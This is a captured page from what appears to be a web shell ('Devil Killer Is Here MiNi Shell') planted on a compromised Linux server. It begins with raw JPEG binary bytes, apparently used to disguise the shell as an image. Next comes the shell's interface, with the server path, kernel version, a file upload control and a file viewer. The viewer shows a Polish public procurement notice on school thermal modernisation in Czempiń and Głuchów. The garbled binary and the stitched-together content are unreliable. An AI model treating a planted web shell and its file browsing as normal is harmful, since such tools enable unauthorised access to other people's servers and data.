JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17502_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17502</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Gmina Czempiń</nazwa><ulica>ul. 24 Stycznia</ulica><nr_domu>25</nr_domu><nr_miesz></nr_miesz><miejscowosc>Czempiń</miejscowosc><kod_poczt>64020 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>wielkopolskie</wojewodztwo><tel>612 826 703</tel><fax>61 282 63 02</fax><email>zamowienia.ug@czempin.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>www.czempin.pl</adres_strony_url><podmiot2c></podmiot2c><regon>63125928700000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu>Wielkopolski Regionalny Program Operacyjny na lata 2014-2020</nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>administracja samorządowa</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia /><dostep_dokumentow_zamowienia></dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.czempin.pl - BIP/zamówienia publiczne powyżej 30 tys. euro</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>operator pocztowy, osobiście, posłaniec</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>T</czy_podzielone_na_czesci><oferty_lub_wnioski>Wszystkie</oferty_lub_wnioski><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Urząd Gminy w Czempiniu, ul. 24 Stycznia 25, 64-020 Czempiń</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Termomodernizacja wraz z modernizacją źródła ciepła oraz instalacji elektryczno-oświetleniowej w budynkach Szkół Podstawowych w Czempiniu i Głuchowie</nazwa_zamowienia><numer_referencyjny>FZ.271.1.2.2017</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>B</rodz_zam><przedmiot_zam>Zadanie 1 – Termomodernizacja budynków SP w Głuchowie
Termomodernizacja budynków szkoły obejmuje w szczególności:
1.	Docieplenie stropodachu warstwą wełny mineralnej o grubości 20 cm wraz z robotami towarzyszącymi oraz usunięciem żużla z dachu, 
2.	Docieplenie ścian fundamentowych o powierzchni 274,5 m2 warstwą styropianu o grubości 16 cm wraz robotami towarzyszącymi,
3.	Docieplenie ścian zewnętrznych o powierzchni 1440,0 m2 warstwą styropianu o grubości 16 cm wraz z robotami towarzyszącymi,
4.	Wymianę instalacji elektrycznej, w szczególności rozdzielnic, instalacji odgromowych, opraw oświetleniowych zewnętrznych i wewnętrznych na ledowe, 
5.	Montaż paneli fotowoltaicznych na dachu budynku,
6.	Wymianę okien i drzwi zewnętrznych w piwnicy,
7.	Utwardzenie terenu (wykonanie opaski wokół budynków)
Zadanie 1 należy wykonać zgodnie z:
a)	Projektem budowlano-wykonawczym – Projekt zagospodarowania terenu, Projekt instalacji elektrycznych
b)	Projektem budowlano-wykonawczym uzupełniającym – Projekt branży elektrycznej
c)	Przedmiarami robót.

UWAGA dot. zadania nr 1 ! Zamawiający zwraca uwagę, że niżej wskazane roboty przedstawione w dokumentacji projektowej są wyłączone z zakresu niniejszego zamówienia: 
1.	Podniesienie attyk (rozbiórka attyk, wymurowanie nowych attyk, wykonanie obróbek blacharskich).
2.	Wymiana kotła c.o.


Zadanie 2 – Termomodernizacja budynków SP w Czempiniu
Termomodernizacja budynków szkoły obejmuje w szczególności:
1.	Renowację elewacji najstarszego budynku szkoły,
2.	Termomodernizację elewacji pozostałych budynków szkoły (wykonanie nowej izolacji murów fundamentowych, odbicie odparzonych tynków, mechaniczne oczyszczenie podłoża, wykonanie warstwy termoizolacji, wykonanie nowych tynków, wymiana obróbek blacharskich, wymiana części stolarki okiennej i drzwiowej, wykonanie nowej izolacji murów fundamentowych) oraz ocieplenie poddasza starego budynku,
3.	Zamurowanie ścianki z luksferów, wykonanie nowych okien w ścianie północno-zachodniej
4.	Termomodernizacja zewnętrznych schodów, podestów i murów oporowych – wykonać dylatację ze styropianu, lub wtrysk z pianki poliuretanowej,
5.	Wymianę instalacji elektrycznych, w tym montaż nowych opraw ledowych,
6.	Wymianę instalacji c.o. wraz z grzejnikami,
7.	Wykonanie robót towarzyszących (napraw po robotach instalacyjnych) 
8.	Malowanie ścian w pomieszczeniach, w których były prowadzone prace instalacyjne
9.	Rozbudowę budynku o pomieszczenie kotłowni gazowej wraz z technologią (montażem nowych kotłów kondensacyjnych i niezbędnej armatury),
10.	Wykonanie wewnętrznej instalacji gazowej,
11.	Wykonanie instalacji elektrycznej w nowej kotłowni,
12.	Modernizację istniejącej kotłowni,
13.	Wykonanie opaski oraz chodnika przy nowej kotłowni,
14.	Rozbiórkę starego komina stalowego
Zadanie 2 należy wykonać zgodnie z:
a)	Projektem budowlano-wykonawczym (2013) – Projekt zagospodarowania terenu, Architektura, Instalacje Sanitarne, Konstrukcje, 
b)	Projektem budowlano-wykonawczym (2015) – Projekt zagospodarowania terenu, Projekt architektoniczno-budowlany, Inwentaryzacja, Konstrukcja, Kotłownia gazowa, Instalacja gazu, Instalacja elektryczna,
c)	Projektem budowlano-wykonawczym zamiennym (2016) 
d)	Projektem rozbiórki komina (2016) 
e)	Przedmiarami robót

UWAGA dot. zadania nr 2 ! Zamawiający zwraca uwagę, że część robót przedstawiona w dokumentacji projektowej wskazana do SIWZ jest wyłączona z zakresu niniejszego zamówienia. Wykaz robót, które nie są objęte niniejszym zamówieniem stanowi załącznik nr 10 do SIWZ
Dla obu obiektów należy wykonać świadectwo charakterystyki energetycznej.
Wykonawca zobowiązany będzie również do zabezpieczenia budynków przed wykonaniem robót oraz innych zaleceń wynikających z ekspertyzy przyrodniczej, inwentaryzacji przedrealizacyjnej i zaleceń nadzoru przyrodniczego.

Zamawiający przewiduje możliwość prowadzenia robót w roku szkolnym w godzinach pracy szkoły, w przypadku robót nieuciążliwych (cichych) i w dniach wolnych od pracy szkół.
</przedmiot_zam><cpv1c>45210000-2</cpv1c><cpv2c>45214000-0</cpv2c><okres2c>29/09/2017</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67>N</czy_przewiduje_udzielenie_zamowien_67><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow></informacje_na_temat_katalogow><okreslenie_warunkow></okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Wykonawca winien wykazać, że: 
-posiada środki finansowe lub zdolność kredytową w wysokości co najmniej:
a)	500 000 zł w przypadku zadania nr 1,
b)	1.000.000 zł w przypadku zadania nr 2.
</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>Wykonawca winien wykazać, że: 

1)wykonał, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie roboty budowlane obejmujące swoim zakresem budowę lub przebudowę lub rozbudowę lub termomodernizację budynku o wartości:
a)co najmniej 700 000 zł brutto każda w przypadku zadania nr 1,
b)co najmniej 1 500 000 zł brutto każda w przypadku zadania nr 2,
W przypadku, gdy jakakolwiek wartość dotycząca ww. warunków wyrażona będzie w walucie obcej, Zamawiający przeliczy tą wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia (data umieszczenia zamówienia w Biuletynie Zamówień Publicznych). Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający przyjmie kurs średni z ostatniej tabeli przed wszczęciem postępowania.

2)dysponuje następującymi osobami, które zostaną skierowane do realizacji niniejszego zamówienia:
a)kierownik budowy  posiadający uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno-budowlanej (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) i minimalne doświadczenie zawodowe: 5 lat na stanowisku kierownika budowy oraz ukończona realizacja jako kierownik budowy co najmniej dwóch robót budowlanych o wartości co najmniej 500 000 zł brutto każda,
b)kierownik robót sanitarnych posiadający uprawnienia budowlane bez ograniczeń 
w specjalności instalacyjnej, co najmniej w zakresie instalacji i urządzeń cieplnych, gazowych, wentylacyjnych, wodociągowych i kanalizacyjnych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) i minimalne doświadczenie zawodowe: 3 lata na stanowisku kierownika robót;
c)kierownik robót elektrycznych posiadający uprawnienia budowlane w specjalności instalacyjnej, co najmniej w zakresie instalacji i urządzeń elektrycznych (lub odpowiadające im równoważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów) i minimalne doświadczenie zawodowe: 3 lata na stanowisku kierownika robót;

Zamawiający dopuszcza łączenie funkcji wyżej wymienionych osób.

Osoby powyższe muszą posiadać niezbędne do wykonania zamówienia kwalifikacje zawodowe, tj. uprawnienia budowlane, o których mowa w ustawie z  dnia 7 lipca 1994 roku – Prawo budowlane (tekst jedn. Dz. U. z 2016 r., poz. 290) oraz w Rozporządzeniu Ministra Infrastruktury i Rozwoju z  dnia 11 września 2014 roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z  2014 r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z  ustawą z  dnia 22 grudnia 2015 roku o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z  2016 r., Nr 65) lub zamierzający świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a ustawy z  dnia 15 grudnia 2000 roku o samorządach zawodowych architektów oraz inżynierów budownictwa (j.t. Dz. U. z  2014 r., poz. 1946).

Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw  Europejskiego Obszaru Gospodarczego, Konfederacji Szwajcarskiej, z  zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (tekst jedn. Dz. U. z 2016 r., poz. 290)

3)	średnie roczne zatrudnienie w ostatnich trzech latach przed upływem terminu składania ofert, a przypadku gdy okres prowadzenia działalności jest krótszy – w tym okresie wynosiło dla: 
a)	zadania 1 – min. 14 osób
b)	zadania 2 – min. 20 osób</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>T</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2 /><art_24_ust_5_pkt_3 /><art_24_ust_5_pkt_4 /><art_24_ust_5_pkt_5>T</art_24_ust_5_pkt_5><art_24_ust_5_pkt_6>T</art_24_ust_5_pkt_6><art_24_ust_5_pkt_7 /><art_24_ust_5_pkt_8 /><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow /><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>1)	informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
2)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy;
3)	oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo – w przypadku wydania takiego wyroku lub decyzji – dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
4)	oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;
5)	oświadczenia wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art.24 ust.5 pkt. 5 i 6 ustawy;
6)	oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>1)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty – załącznik nr 4 do SIWZ;
2)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami– załącznik nr 5 do SIWZ ;
3)	oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy w ostatnich trzech latach przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy – w tym okresie – załącznik nr 8 do SIWZ,
4)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji></zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>Do oferty należy dołączyć pełnomocnictwo (oryginał lub kopia potwierdzona za zgodność z oryginałem przez notariusza), o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą.</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci></wykaz_potwierdzenie_okolicznosci><wadium>Wykonawca jest zobowiązany do wniesienia wadium w wysokości:
Dla zadania nr 1   20 000,00 zł. (słownie: dwadzieścia tysięcy zł 00/100)
Dla zadania nr 2   40 000,00 zł. (słownie: czterdzieści tysięcy zł 00/100)


12.2.	Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy:

1)	W pieniądzu, przelewem na rachunek bankowy: Bank Spółdzielczy w Poniecu, Oddział w Czempiniu, 36 8682 1030 0040 0000 0390 0003, tytułem: „FZ.271.1.2.2017 Termomodernizacja SP w Czempiniu i Głuchowie – ZADANIE…”
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240).</wadium><czy_wadium>T</czy_wadium><przewiduje_udzielenie_zaliczek></przewiduje_udzielenie_zaliczek><czy_przewiduje_udzielenie_zaliczek>N</czy_przewiduje_udzielenie_zaliczek><zlozenie_katalogow_elektronicznych_informacje_dodatkowe></zlozenie_katalogow_elektronicznych_informacje_dodatkowe><czy_dopuszcza_zlozenie_katalogow_elektronicznych>N</czy_dopuszcza_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_katalogow_elektronicznych>N</czy_wymaga_zlozenie_katalogow_elektronicznych><czy_wymaga_zlozenie_oferty_wariantowej>N</czy_wymaga_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej>N</czy_dopuszcza_zlozenie_oferty_wariantowej><czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej>N</czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej><liczba_wyk></liczba_wyk><minimalna_liczba_wykonawcow></minimalna_liczba_wykonawcow><maksymalna_liczba_wykonawcow></maksymalna_liczba_wykonawcow><wybor_wyk></wybor_wyk><kod_trybu>PN</kod_trybu><z_kim_umowa_bedzie_zawarta /><czy_ograniczenie_liczby_uczestnikow /><ograniczenie_liczby_uczestnikow></ograniczenie_liczby_uczestnikow><ograniczenie_liczby_uczestnikow_informacje_dodatkowe></ograniczenie_liczby_uczestnikow_informacje_dodatkowe><czy_obejmuje_ustanowienie /><obejmuje_ustanowienie></obejmuje_ustanowienie><obejmuje_ustanowienie_informacje_dodatkowe></obejmuje_ustanowienie_informacje_dodatkowe><czy_pobranie_umowy_ramowej_dynamicznego_katalogow /><czy_umowy_ramowej_dynamicznego_katalogow /><czy_zmiana_umowy>T</czy_zmiana_umowy><zmiana_umowy>Na podstawie art. 144 ust. 1 pkt 1) ustawy z dnia 29 stycznia 2004 roku – Prawo zamówień publicznych, Zamawiający dopuszcza: 
1)	przedłużenie terminu wykonania Umowy, jeżeli niemożność dotrzymania pierwotnego terminu stanowi konsekwencję:
a)	konieczności wykonania robót zamiennych lub zmian do umowy na podstawie art. 144 ust. 1 pkt 2 lub 3 ustawy prawo zamówień publicznych,
b)	przyczyn zależnych od Zamawiającego, Organów Administracji, innych osób lub podmiotów, za których działania nie odpowiada Wykonawca,
c)	siły wyższej,
d)	warunków atmosferycznych nie pozwalających na realizację robót, dla których określona odpowiednimi normami technologia wymaga właściwych warunków atmosferycznych, 
e)	zmian spowodowanych warunkami geologicznymi, terenowymi 
(w szczególności przebiegiem urządzeń podziemnych, instalacji lub obiektów infrastrukturalnych), archeologicznymi, wodnymi itp., odmiennymi od przyjętych w dokumentacji projektowej, tj.: np.: wyższy poziom wody gruntowej, inny przebieg urządzeń i instalacji podziemnych, których nie ma 
w planach itp.),
W powyższych przypadkach termin wykonania Umowy może ulec odpowiedniej zmianie – jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć takiej zmiany.
2)	ograniczenie zakresu zamówienia, gdy rezygnacja z danej części jest korzystna dla Zamawiającego lub wynika z obiektywnie uzasadnionych przesłanek (np. zmiana dokumentacji projektowej, sposób zagospodarowania terenu),
3)	roboty zamienne jeżeli takie zmiany w szczególności:
a)	zapewnią prawidłową realizację Umowy, 
b)	obniżą koszty wykonania robót lub eksploatacji obiektów stanowiących Przedmiot Umowy, 
c)	zapewnią optymalne parametry technicznych lub podniosą standard jakości robót i obiektów stanowiących Przedmiot Umowy,
d)	będą wynikały ze sposobu zagospodarowania terenu;
e)	będą wynikały z konieczności zmiany dokumentacji projektowej;
f)	przyniosą inne, wymierne korzyści dla Zamawiającego. 
4)	obniżenie wynagrodzenia z uwagi na zmianę lub ograniczenie faktycznego zakresu realizacji Umowy w szczególności w wyniku okoliczności o których mowa w ust. 1 pkt. 2 i 3 niniejszego paragrafu.
